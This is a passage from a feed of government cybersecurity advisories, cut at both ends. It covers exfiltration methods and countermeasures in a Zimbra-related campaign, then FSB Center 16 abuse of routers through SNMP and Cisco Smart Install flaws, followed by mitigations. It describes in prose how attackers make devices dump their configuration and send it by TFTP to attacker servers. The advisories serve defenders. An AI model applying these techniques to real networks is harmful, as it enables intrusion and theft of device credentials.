&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Victim information was exfiltrated over both HTTPS and DNS.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1048.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/003/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1048.003&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Appendix B: MITRE D3FEND countermeasures &lt;/strong&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;appendixb&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#table20&quot;&gt;&lt;strong&gt;Table 20&lt;/strong&gt;&lt;/a&gt; for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. &lt;a class=&quot;ck-anchor&quot; id=&quot;table20&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW46665017 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 20: MITRE D3FEND Countermeasures&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Countermeasure Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Description&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Application Hardening&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationHardening&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-AH&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW46665017 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Organizations should immediately prioritize patching &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;CVE-2025-66376&lt;/u&gt;&lt;/a&gt;.&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Organizations should promptly apply software updates to all email systems.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Isolate&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/tactic/d3f:Isolate/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;d3f:Isolate&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Organizations that cannot feasibly patch should use alternative mail clients.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Credential Hardening&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-CH&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Network Traffic Analysis&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-NTA&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;DNS Traffic Analysis&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-DNSTA&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Network Traffic Community Deviation&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-NTCD&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW46665017 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Organizations should monitor for connections to internal services, such as webmail, from VPN providers.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Identifier Activity Analysis&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-IAA&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Organizations should search for the listed known IOCs.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;Process Analysis&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW46665017 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ProcessAnalysis&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;D3-PA&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW46665017 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW46665017 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Organizations should search ZCS log files for specific commands used by the malicious script.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message Analysis&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageAnalysis&quot;&gt;D3-MA&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
</description>
  <pubDate>Tue, 21 Jul 2026 15:08:02 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25205</guid>
    </item>
<item>
  <title>Improve Router Hygiene to Protect Against Russian State-Sponsored Targeting</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-194a</link>
  <description>&lt;p&gt;Russian Government-Sponsored Activity Targets Poorly Configured and Vulnerable Devices Across Critical Sectors&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Executive summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Russian Federal Security Service (FSB) Center 16 cyber actors continue to exploit poorly configured and vulnerable networking devices worldwide, opportunistically compromising multiple critical infrastructure sector networks. This joint Cybersecurity Advisory (CSA) builds on FBI’s &lt;a href=&quot;https://www.ic3.gov/PSA/2025/PSA250820&quot; target=&quot;_blank&quot;&gt;Russian Government Cyber Actors Targeting Networking Devices, Critical Infrastructure&lt;/a&gt; Public Service Announcement of the decade-plus FSB Center 16 cyber activity by providing additional tactics, techniques, and procedures (TTPs) to enable defenders to more fully understand and counter the threat. [&lt;a href=&quot;#Work1&quot;&gt;1&lt;/a&gt;]&amp;nbsp;&lt;/p&gt;
&lt;p&gt;This CSA is being released by the following authoring and co-sealing agencies:&amp;nbsp;&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;United States National Security Agency (NSA)&lt;/li&gt;
&lt;li&gt;United States Cybersecurity and Infrastructure Security Agency (CISA)&lt;/li&gt;
&lt;li&gt;United States Federal Bureau of Investigation (FBI)&lt;/li&gt;
&lt;li&gt;United States Department of Defense Cyber Crime Center (DC3)&lt;/li&gt;
&lt;li&gt;Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)&lt;/li&gt;
&lt;li&gt;Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)&lt;/li&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ)&lt;/li&gt;
&lt;li&gt;United Kingdom National Cyber Security Centre (NCSC-UK)&lt;/li&gt;
&lt;li&gt;Czech Republic National Cyber and Information Security Agency (NÚKIB)&lt;a href=&quot;#Foot1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Danish Defence Intelligence Service (DDIS)&lt;a href=&quot;#Foot2&quot;&gt;&lt;sup&gt;2&amp;nbsp;&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Estonian Foreign Intelligence Service (EFIS)&lt;a href=&quot;#Foot3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Estonian Information System Authority (RIA)&lt;a href=&quot;#Foot4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Finnish Defence Intelligence (FDI)&lt;a href=&quot;#Foot5&quot;&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Finnish Security and Intelligence Service (SUPO)&lt;a href=&quot;#Foot6&quot;&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;French National Cybersecurity Agency (ANSSI)&lt;a href=&quot;#Foot7&quot;&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Italian External Intelligence and Security Agency (AISE)&lt;a href=&quot;#Foot8&quot;&gt;&lt;sup&gt;8&amp;nbsp;&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Italian Internal Intelligence and Security Agency (AISI)&lt;a href=&quot;#Foot9&quot;&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The Military Counterintelligence Service of Poland (SKW)&lt;a href=&quot;#Foot10&quot;&gt;&lt;sup&gt;10&amp;nbsp;&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Sweden National Cyber Security Centre (NCSC-SE)&lt;a href=&quot;#Foot11&quot;&gt;&lt;sup&gt;11&amp;nbsp;&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The authoring and co-sealing agencies strongly urge device owners and network defenders to take mitigation and remediation actions against Russian government-sponsored exploitation of vulnerable routers.&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/Figure%201%20FSB%20Center%2016%20activity%20and%20recommended%20mitigation%20actions.png?itok=oYxdyna4&quot; width=&quot;1024&quot; height=&quot;576&quot; alt=&quot;Adversary Techniques and corresponding Mitigation Actions as described in the Technical details and Mitigation actions sections.&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;Figure 1: FSB Center 16 activity and recommended mitigation actions&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;Download the PDF version of this report:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/0/CSA_IMPROVE_ROUTER_HYGIENE.PDF&quot; target=&quot;_blank&quot;&gt;Improve Router Hygiene to Protect Against Russian State-Sponsored Targeting&lt;/a&gt; (PDF, 816KB)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Cybersecurity industry tracking&amp;nbsp;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to this activity. Although not all encompassing, the following list contains the most notable threat group names commonly used within the cybersecurity community related to this activity:&amp;nbsp;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Berserk Bear&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Energetic Bear&lt;/li&gt;
&lt;li&gt;Crouching Yeti&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Dragonfly&lt;/li&gt;
&lt;li&gt;Ghost Blizzard&lt;/li&gt;
&lt;li&gt;Static Tundra&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this list may not provide a 1:1 correlation to the authoring agencies’ understanding for all activity related to these groupings.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Targeting details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Critical infrastructure sectors most at risk from the Russian Federal Security Service (FSB) Center 16 cyber actors’ targeting include:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Communications,&lt;/li&gt;
&lt;li&gt;Defense Industrial Base,&lt;/li&gt;
&lt;li&gt;Energy,&lt;/li&gt;
&lt;li&gt;Financial Services,&lt;/li&gt;
&lt;li&gt;Government Services and Facilities, especially organizations at the state and local level, and&lt;/li&gt;
&lt;li&gt;Healthcare and Public Health.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Technical details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note: &lt;/strong&gt;This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot;&gt;MITRE ATT&amp;amp;CK® Matrix for Enterprise&lt;/a&gt;&lt;a href=&quot;#Foot12&quot;&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;/a&gt; framework, version 19. See &lt;a href=&quot;#AppA&quot;&gt;&lt;strong&gt;Appendix A&lt;/strong&gt;&lt;/a&gt; for tables of the activity mapped to MITRE ATT&amp;amp;CK tactics and techniques. This advisory also uses MITRE DEFEND&lt;sup&gt;TM&lt;/sup&gt; version 1.4.0.&lt;/p&gt;
&lt;p&gt;The Russian FSB Center 16 cyber actors primarily use scanning to identify poorly configured networking devices, primarily routers, for exploitation. The actors scan for Internet IP ranges with active Simple Network Management Protocol (SNMP) agents that accept common or default community strings for authentication [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/001/&quot; target=&quot;_blank&quot;&gt;T1595.001&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/002/&quot; target=&quot;_blank&quot;&gt;T1595.002&lt;/a&gt;]. These scans, run via proxies, consist of SNMP Set-Requests from a spoofed IP address [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/&quot; target=&quot;_blank&quot;&gt;T1027&lt;/a&gt;] containing Object Identifiers (OIDs) that instruct the SNMP agent on poorly configured networking devices to [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1569/&quot; target=&quot;_blank&quot;&gt;T1569&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1602/001/&quot; target=&quot;_blank&quot;&gt;T1602.001&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/&quot; target=&quot;_blank&quot;&gt;T1090&lt;/a&gt;]:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Copy its configuration to a file, often called “config.bkp” or “output.txt” [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/&quot; target=&quot;_blank&quot;&gt;T1003&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1602/002/&quot; target=&quot;_blank&quot;&gt;T1602.002&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Transfer the file, typically using Trivial File Transfer Protocol (TFTP), to an actor-controlled leased virtual private server (VPS) or compromised FTP server [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/003/&quot; target=&quot;_blank&quot;&gt;T1583.003&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/&quot; target=&quot;_blank&quot;&gt;T1090&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1071/&quot; target=&quot;_blank&quot;&gt;T1071&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/&quot; target=&quot;_blank&quot;&gt;T1048&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While SNMP scanning is the primary method the actors use to discover and exploit poorly configured networking devices, they occasionally exploit common vulnerabilities and exposures (CVEs) in Cisco devices, Cisco’s Smart Install (SMI) functionality, and web portals to manage network devices. The actors previously exploited at least the following CVEs [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1584/008/&quot; target=&quot;_blank&quot;&gt;T1584.008&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/005/&quot; target=&quot;_blank&quot;&gt;T1588.005&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1190/&quot; target=&quot;_blank&quot;&gt;T1190&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1068/&quot; target=&quot;_blank&quot;&gt;T1068&lt;/a&gt;]:&amp;nbsp;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2018-0171&quot; target=&quot;_blank&quot;&gt;CVE-2018-0171&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2008-4128&quot; target=&quot;_blank&quot;&gt;CVE-2008-4128&lt;/a&gt;&lt;a href=&quot;#Foot13&quot;&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Many of these TTPs overlap with activity by other malicious cyber actors, such as &lt;a href=&quot;https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF&quot; target=&quot;_blank&quot;&gt;Salt Typhoon&lt;/a&gt;. Even though this CSA focuses on Russian FSB Center 16 cyber activity, the mitigations below should detect and counter these and similar TTPs used by other actors.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Mitigation actions&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The authoring agencies highly recommend network defenders implement the following mitigations to harden networks against this exploitation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Disable Cisco Smart Install on all devices [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening&quot; target=&quot;_blank&quot;&gt;D3-ACH&lt;/a&gt;]. [&lt;a href=&quot;#Work2&quot;&gt;2&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;Use SNMPv3 with “authPriv” configured to the most modern encryption standard that is supported by the device instead of SNMPv1 or SNMPv2 [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening&quot; target=&quot;_blank&quot;&gt;D3-ACH&lt;/a&gt;]. [&lt;a href=&quot;#Work3&quot;&gt;3&lt;/a&gt;]
&lt;ul&gt;
